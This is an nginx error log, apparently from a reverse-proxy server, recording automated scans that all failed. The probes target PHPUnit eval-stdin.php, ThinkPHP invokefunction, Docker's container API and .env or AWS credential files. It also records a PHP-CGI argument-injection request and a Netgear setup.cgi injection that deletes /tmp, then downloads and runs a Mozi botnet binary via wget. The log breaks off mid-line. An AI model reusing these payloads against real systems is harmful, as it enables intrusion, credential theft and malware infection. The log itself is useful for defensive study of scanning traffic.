"222.117.41.51:80" -2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:45 [error] 906#906: *44111 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:46 [error] 906#906: *44111 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 12:01:33 [error] 923#923: *47148 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 13:14:23 [error] 924#924: *48610 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 14:18:41 [error] 917#917: *53499 open() "/var/www/html/setup.cgi" failed (2: No such file or directory), client: 27.43.206.93, server: localhost-nginx-proxy-manager, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" -2026/02/17 14:48:31 [error] 917#917: *55821 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 16:06:09 [error] 920#920: *63758 open() "/var/www/html/version" failed (2: No such file or directory), client: 36.255.223.98, server: localhost-nginx-proxy-manager, request: "GET /version HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 16:06:09 [error] 920#920: *63762 open() "/var/www/html/v1" failed (2: No such file or directory), client: 36.255.223.98, server: localhost-nginx-proxy-manager, request: "GET /v1 HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 16:10:05 [error] 917#917: *65711 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:00:50 [error] 920#920: *71526 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:00:55 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:00:57 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:00:58 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:00 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:02 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:03 [error] 920#920: *71526 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:05 [error] 920#920: *71526 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:06 [error] 920#920: *71526 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:07 [error] 920#920: *71526 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:08 [error] 920#920: *71526 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:09 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:11 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:11 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:12 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:14 [error] 920#920: *71526 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:15 [error] 920#920: *71526 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:16 [error] 920#920: *71526 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:17 [error] 920#920: *71526 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:18 [error] 920#920: *71526 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:19 [error] 920#920: *71526 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:20 [error] 920#920: *71526 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:20 [error] 920#920: *71526 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:22 [error] 920#920: *71526 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:23 [error] 920#920: *71526 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:24 [error] 920#920: *71526 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:26 [error] 920#920: *71526 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:27 [error] 920#920: *71526 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:30 [error] 920#920: *71526 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:32 [error] 920#920: *71526 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:34 [error] 920#920: *71526 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:36 [error] 920#920: *71526 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:38 [error] 920#920: *71526 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:41 [error] 920#920: *71526 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:44 [error] 920#920: *71526 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:47 [error] 920#920: *71526 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:49 [error] 920#920: *71526 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:51 [error] 920#920: *71526 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:53 [error] 920#920: *71526 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:54 [error] 920#920: *71526 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 17:01:59 [error] 920#920: *71526 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 22:33:02 [error] 928#928: *92796 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 52.186.171.52, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51" -2026/02/18 03:04:21 [error] 939#939: *93612 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:50:31 [error] 940#940: *93741 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 45.91.64.7, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:50:31 [error] 940#940: *93743 open() "/var/www/html/aab9" failed (2: No such file or 